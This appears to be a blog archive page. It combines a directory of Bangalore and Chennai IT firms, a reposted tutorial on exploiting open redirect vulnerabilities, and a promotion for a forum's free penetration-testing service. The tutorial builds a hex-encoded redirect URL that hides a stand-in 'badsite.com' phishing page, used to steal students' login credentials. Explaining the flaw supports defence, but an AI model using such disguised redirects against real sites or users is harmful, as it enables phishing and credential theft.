Professional services Website: www.otpl.com Email: gdevanur@ivega.com Location: Bangalore Information Technology Park Ltd. Specialisation: Establish and Maintain Information Technology Park Website: www.intltechpark.com Location: Bangalore ILI Technologies (P) Ltd Specialisation: Biometrics solutions, RFID Solutions, Authentication Solutions, ASPs Website: www.ilitec.com Email: ckishan_chowbene@ilitec.com Location: Bangalore Integra Micro Systems (P) Ltd Specialisation: Telecom Billing, Customer Care, CRM, MIS, Embedded Software, Testing & Verification, Life Cycle Maintenance, Device Drivers Website: www.integramicro.com Email: info@integramicro.com Location: Bangalore iCelerate Technologies Private Limited Specialisation: Win 95, Win 98, Win NT, C, C++, Web technologies / Database management, Device Drivers / Colour Management / Biometrics, Card personalization including abase management, Device Drivers / Colour Management / Biometrics, Card personalization Website: www.imergent.net Email: pnv@datacard.com Location: Bangalore iCOPE Technologies Private Limited Specialisation: Technology Domains: Telecommunication, Telematics, Messaging, Internet Areas Of Application Development: Groupware, Unified Messaging, CTI, Mobile Internet, Security, e-Banking, e-CRM/SCM Website: www.icope.com Email: icope@icope.com Location: Bangalore IonIdea Enterprise Solutions Pvt Ltd Specialisation: Interactive Media Domain, Enterprise Applications & Products, Telecom & Communications S/W, Financial Service Industry Website: www.ionideasolutions.com Email: mohan.kumar@ionidea.com Location: Bangalore Kals Information Systems Ltd Specialisation: Consulting & Implementation of Insurance, Consulting design & development of workflow, Groupware & development management Solutions, Design & Development of Web enabled application software & e-commerce system, redesign & web enablinglegacy application Website: www.kalsinfo.com Email: srini@kalsinfo.com Location: Bangalore Khodayss Systems Limited Specialisation: Internet and E-Commerce, Hardware Products Development, IT Enabled Services Website: www.khodayss.com Email: sanjaydugar@khodayss.co.in Location: Bangalore Kals Information Systems Ltd Specialisation: Consulting & Implementation of Insurance, Consulting design & development of workflow, Groupware & development management Solutions, Design & Development of Web enabled application software & e-commerce system, redesign & web enablinglegacy application Website: www.kalsinfo.com Email: srini@kalsinfo.com Location: Bangalore Khodayss Systems Limited Specialisation: Internet and E-Commerce, Hardware Products Development, IT Enabled Services Website: www.khodayss.com Email: sanjaydugar@khodayss.co.in Location: Bangalore Kirloskar Computer Services Ltd. Specialisation: Distribution, Manufacturing, Internet & Intranet, Engineering Website: www.kcsl.com Email: ashim@kcsl.com Location: Bangalore KMG Infotech Pvt Ltd Specialisation: IT consultancy & software development, Insurance solution, SCM solution, Web enabling of legacy & E-commerce Website: www.kmgus.com Email: shailly.Arora@kmgus.com Location: Bangalore LEC India Software Centre Ltd. Specialisation: Object Technology, Client Server, ERP/MRP Solutions, RDBMS/Dataware Housing Website: www.lecindia.com Email: lecindia@lec.dk Location: Bangalore LG Soft India Private Limited Specialisation: Emerging Technologies, E-Commerce, Enterprise systems, Embedded Systems, Systems Integration / Systems management Website: www.lg-soft.com Email: lgsi@stpb.soft.net/ritesh@lgsi.co.in Location: Bangalore Linc Software Services Pvt. Ltd. Specialisation: AS/400 - based software development and services, ERP Solution Providers, Restructuring Services (Year 2000 and Euro), Product Marketing Website: www.lincsoftware.com Email: lincindia@lincsoftware.soft.net Location: Bangalore Lucent Technologies India (P) Ltd. Specialisation: Software R & D for Wireless Networks Website: www.lucent.com Email: sharadsharma@lucent.com Location: Bangalore Login Infotech Private Limited Specialisation: Consulting, Training, Systems Integration, Internet and E- Commerce Email: login@vsnl.com Location: Bangalore Leo Infotech (P) Ltd. Specialisation: e-com Solutions,Software Solutions Websites & Web hosting, GIS - Remote sensig (linked with ISRO ) Website: www.leoinfo.com Email: leoinfo@vsnl.com Location: Bangalore Logica Private Limited Specialisation: Financial Products and solutions, Telecommunications, Energy & Utilities, System Integration, Consultancy Website: www.logica.com Email: Info-in@Logica.com Location: Bangalore Majoris Systems Pvt Ltd Specialisation: Turnkey software development services, IT Enabled Services, Internet, E-Commerce, Quality consulting Website: www.majoris.com Email: venkatesh.bv@majoris.com Location: Bangalore Manjushree Infotech (IT - Divi. Of Manjushree Plantation) Specialisation: On Site / Off Shore Services, Consultancy & Projects, Internet and E- Commerce Website: www.manjushreeinfotech.com Email: info@manjushreeinfotech.com Location: Bangalore Microland Ltd. Specialisation: E-commerce application, Enterprise Web Services application, Intranets, Networking & embedded systems, System Integration & Platform migration Website: www.microlandsw.com Email: bekayj@microland.co.in Location: Bangalore Mascot Systems Pvt. Ltd. Specialisation: Enterprise-wide development, reengineering and maintenance of application software in the areas of E-business, business intelligence, ERP and mobile commerce across mainframe, midrange, client server and Internet platforms Website: www.mascotsystems.com Email: sshekar@mascotsystems.com Location: Bangalore Mindtree Consulting Pvt Ltd Specialisation: Electronic Commerce, Internet Appliances, Telecom Technology Website: www.mindtree.com Email: subroto@mindtree.com Location: Bangalore Motorola India Electronics Private Ltd. Specialisation: Network Management, Communication Protocols, Digital Signal Processing, Systems Engineering Email: sammy_sana@miel.mot.com Location: Bangalore Medicom Solutions (P) Ltd Specialisation: Hospital Information Systems, Clinical Workstation, Clinical Information Systems Website: www.medicomsoft.com Email: bangalore@medicomsoft.com Location: Bangalore Mindteck (India) Ltd Specialisation: Internet applications, Embedded solutions Website: www.mindteck.com Email: vijay@mindteck.com Location: Bangalore Tally Solutions Pvt Ltd Specialisation: Business management software, technology R&D, products creation Website: www.tallysolutions.com Email: bharat@tallysolutions.com Location: Bangalore Travelanza.com Pvt. Ltd. Specialisation: Online travel booking Website: www.travelanza.com Email: mail@travelanza.com Location: Bangalore Tata Elxsi (India) Limited Specialisation: Visual Computing - Modeling, Medical Imaging, Simulation, Networking, Communications, Internet, Intranet, Groupware, Systems Development (DSP, VLSI, VHDL, Audio / Video Codecs, Storage Management), Design & Engineering Services - CAD / CAM / CAE Website: www.tataelxsi.com Email: dev@elxsi.ernet.in Location: Bangalore Tektronix Engineering Development (India) Ltd. Specialisation: Micro Processor Support for Logic analysers, Internet Printing, System Software, Film Editors Website: www.tek.com Location: Bangalore Texas Instruments India Limited Specialisation: Integrated Circuit and Software Design Website: www.ti.com/india Email: s_rajam@ti.com Location: Bangalore Chennai Companies & Consultants Indchem Software Technologies limited Specialisation: Communications and Networking, Process Control and Industrial Automation, Real Time Audio and Video, Banking and Insurance Website: www.sanmargroup.com Email: sp@sanmargroup.com Location: Chennai India Software Group-ISG Specialisation: Enterprise Wide Solutions- ERP Implementation - SAP & Oracle and Productivity Improvement Tools - Plexus & Lotus, Datawarehousing & Mining - SAS Tools, Custom Development of Off-Shore and On-site Services, Human Resource Management System Product Develop Email: indsoft@vsnl.com Location: Chennai Intelligent Systems India Pvt. Ltd. Specialisation: Software Development, System Integration, Software Migration, Product Development and Maintenance Email: isi@md2.vsnl.net.in Location: Chennai Insoft.com Pvt Ltd Specialisation: Formulate, design,develop, market, franchise, export, sell & licence software Website: www.insoft.com Email: admin@insoft.com Location: Chennai Kumaran Systems (P) Ltd. Specialisation: Migration (Anywhere to Oracle, Anywhere To Microsoft), Systems Management, Internet Services Website: www.kumaran.com Email: mohans-office@kumaran.com Location: Chennai Laser Soft Infosystems Ltd. Specialisation: Banking, Trade Finance, Healthcare, E-commerce Website: www.lsisl.com Email: lsi@vsnl.com Location: Chennai Lateral Software Technology Pvt Ltd Specialisation: Education Training on Linux, Open Sources & Linux, software Development, e-business Enabled Website: www.lateralsoftware.com Email: lateral@md4.vsnl.net.in Location: Chennai Landmark Infotech Systems & Solutions Pvt Ltd Specialisation: Applied IT Training, Biometric Software solutions, Retail/Suply chain solutions, Logistics Website: www.landmarkinfotech.com Location: Chennai Lister Technologies Private Ltd Specialisation: Wireless & Mobile solutions, E-solutions implementation, SMART card solutions, wireless consultancy Website: www.listertechnologies.com Email: murali@listremail.com Location: Chennai

Read More

Exploiting Redirect Vulnerabilities

I was surfing through my friend’s forum Secworm.net and read this thread about Redirection Vulnerabilities. So I thought of sharing it with you guys.

Phishing is usually considered to be most effective when it’s combined with social engineering, the hacker term for human manipulation. One way phishing can be combined with social engineering is through the exploitation of redirect vulnerabilities. This article will demonstrate to you what redirect vulnerabilities are, how to spot them, and how they can be exploited.

So first things first. What is a redirect vulnerability? A redirect vulnerability is when a webpage uses a script to redirect you to somewhere (usually another page on the website), but they write that script in such a way that it allows a hacker to manipulate it to send you to an external page instead of an internal one. There are many types of redirect vulnerabilities, but we’ll be looking at the most basic type here for now. Example: let’s say we’re logging in to webpage that has this url:

Code:

http://www.example.com/login.php?dest=members/index.html

Let’s have a look at the url. It’s all looking pretty ordinary up to login.php, but look one step after that. See the dest=members/index.html? members/index.html is the path to the index page for logged in members, so you can determine that dest=members/index.html is a parameter that is being used by the login.php script to redirect users to the member index page after a successful login. Now if the creator of the login.php script was very security conscious, they’d make sure that the dest field could never point to a url that’s not an approved destination. However, if he didn’t know about redirect vulnerabilities, he would just write the script so that it would redirect the user to whatever address dest pointed to. In order to find which one we’re dealing with for this website, we can change the dest parameter and see how the script responds. For instance:

Code:

http://www.example.com/login.php?dest=http://www.google.com

If this page is vulnerable to redirect vulnerabilities, this it should send us to google after we log in. If not, it will generate some sort of error condition and take you to a default page. So if we change the address as specified above, log in, and find ourselves looking at google instead of example.com, then we know it’s vulnerable to redirect vulnerabilities.

Now that you know what redirect vulnerabilities are, can you see how they can be applied to phishing? Let me create a scenario to give you an idea of how redirect vulnerabilities can be used to increase the effectiveness of phishing. Imagine yourself to be a student at a university. You have a school website with the address http://www.myschool.com, and you log in to all your school services (such as mail, course info, etc) through the url

Code:

www.sys.myschool.com/login.php?service=

where the service parameter points to the address of the service being accessed, as demonstrated in the following urls:

Code:

http://www.portal.myschool.com/login.php?service=sys/mail.php

or

http://www.portal.myschool.com/login.php?service=sys/courseInfo.php

Phishers have been targeting students of your school lately, so your system administrators have sent everyone an email telling them to check the url of every webpage they log into with their school account to make sure it’s an actual school page and not a phishing page. A hacker is aware of this, and realizing that this advice will give the you and the other students a false sense of security when you’re on pages that are actual school pages, set out looking for a way to get students to access his phishing page from within the school login system itself. He sees the above urls and recognizes their potential to be vulnerable to redirect exploitation and creates a phishing page that looks exactly like your school’s page that is displayed to you when your login fails. Being a phishing page, it sends him all the login credentials of everyone who logs in through it. Once he knows that the login script is indeed vulnerable, he creates a link to his phishing page from the school login page, hoping that students will log in to the school through his link, get redirected to his fake page, enter their information again without realizing that they left the school page, and then become redirected back to their school page without even noticing that anything out of the ordinary had happened. He starts out with a link like this:

Code:

http://www.portal.myschool.com/login.php?service=http://badsite.com/fakePage.php

However, he realizes that some of the more observant students might see the external address in the url and be too wary to enter their information, so he changes his url into its hexidecimal representation, either by memory or using a tool like this one: http://secworm.net/showthread.php?tid=3, and achieves an ordinary-looking url like this one:

Code:

http://www.portal.myschool.com/login.php?service=%68%74%74%70%3a%2f%2f%62%61%64%73%69%74%65%2e%63%6f%6d%2f%66%61%6b%6 ?5%50%61%67%65%2e%70%68%70

This url gives no indication that it actually redirects students to the hacker’s phishing page, and since you see your school’s domain in the beginning, you and the students think nothing of it. The hacker then sends this link along with an email making the reader want to log in to the student database and steals all their passwords.

Hopefully this will help you understand the basics of redirect vulnerabilities and how they can be used to increase the effectiveness of phishing.

Via. www.Secworm.net

Read More

Get Your Website Secured – Free Penetration Service

The question which screw every webmaster’s mind is “How secure my website is?”. Every webmaster is very keen about their website’s security because they do not want to compromise any of the data on it. I have seen many websites getting hacked every now and then. Not only user’s personal information gets compromised but also reputation of the site goes down to zero! There are some professional Ethical hackers who provides Penetration Testing services for websites, but it costs like $500 and above to get any website tested, which not every one can afford.

I found this interesting offer while surfing through SecWorm.net. SecWorm is HackingArticle’s affiliate. Its a forum about Hardcore security and Ethical hacking. Staff of secworm is very much experienced in security field. I have seen them testing many websites and applications and helping people to secure their stuffs.

I noticed they have started this service called “FREE PENETRATION AND BETA TESTING FOR ANY TYPE OF WEBSITE!”, and I was like WHOA!, it is really a good way to help webmasters. One of the staff member of Secworm is my good friend. I asked him why would you provide such an expensive service for free. His answer impressed me, only thing he said was “SecWorm’s slogan is Human Knowledge if for the world, Support Open Source and thats exactly what we are doing.” It made sense to me.

I trust SecWorm people because they have helped me fixing few security issues with HackingArticles. So Any of you want to get your website checked you can visit www.SecWorm.net.

READ THIS TO GET DETAILED INFORMATION.

Read More